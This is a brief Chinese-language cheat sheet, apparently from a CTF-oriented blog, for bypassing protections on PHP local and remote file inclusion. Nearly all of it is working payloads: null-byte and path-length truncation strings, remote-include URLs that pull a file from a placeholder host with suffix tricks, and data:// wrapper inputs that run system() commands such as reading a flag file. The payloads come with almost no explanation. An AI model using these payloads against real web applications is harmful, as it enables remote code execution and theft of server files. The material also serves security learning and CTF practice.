本地包含限制绕过
- %00截断:条件:magic_quotes_gpc = off php版本<5.3.4
filename=../../../www.txt%00
- 长度截断(推荐):条件:windows,点号需要长于256;linux长于4096
filename=1.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
远程包含限制绕过
- http://127.0.0.1:8080/include.php?filename=http://xxxx/**test.txt**
- http://127.0.0.1:8080/include.php?filename=http://xxxx/**test.txt%20**
- http://127.0.0.1:8080/include.php?filename=http://xxxx/**test.txt%23**
http://127.0.0.1:8080/include.php?filename=http://xxxx/**test.txt?**
协议绕过
所有协议支持情况
PHP
参考链接:https://www.cnblogs.com/endust/p/11804767.html
payload:/?page=data://text/plain,<?php system(“命令“)?>
- /?page=data://text/plain,<?php system(“cat fl4gisisish3r3.php”)?>
- /?page=data://text/plain;base64,xxxx(base64编码后的数据)
Java
参考上表所有协议支持情况。
若有收获,就点个赞吧
0 人点赞
